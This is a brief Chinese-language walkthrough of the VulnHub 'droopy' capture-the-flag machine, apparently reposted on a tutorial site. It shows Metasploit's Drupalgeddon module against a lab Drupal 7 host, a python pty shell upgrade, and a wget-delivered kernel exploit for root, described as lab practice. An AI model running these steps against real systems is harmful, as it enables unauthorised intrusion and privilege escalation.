靶机-droopyCTF Walkthrough

社会主义新天地 提交于 2019-11-28 06:01:11
droopyCTF
https://www.vulnhub.com/?q=droopy&sort=date-des&type=vm
 
1.获取目标ip地址,并进行端口发现,目标只开启了80端口
netdiscover -i eth0 -r 192.168.88.1/24

访问web页面

 

Drupal 7 应该是一个类似于wordpress的一个开源的框架
searchsploit Drupal 7 搜索相关漏洞

使用 msf 利用 漏洞

use exploit/multi/http/drupal_drupageddon
set rhosts 192.168.88.200
exploit
利用注入漏洞上传payload 获得shell

搜索内核相关漏洞信息

使用 pty 获取完整性shell
python -c 'import pty; pty.spawn("/bin/bash")'

开启web,使用 wget 将 漏洞利用代码下载到目标机器

 

编译.c文件,执行漏洞利用程序,成功获得root权限。

 
标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!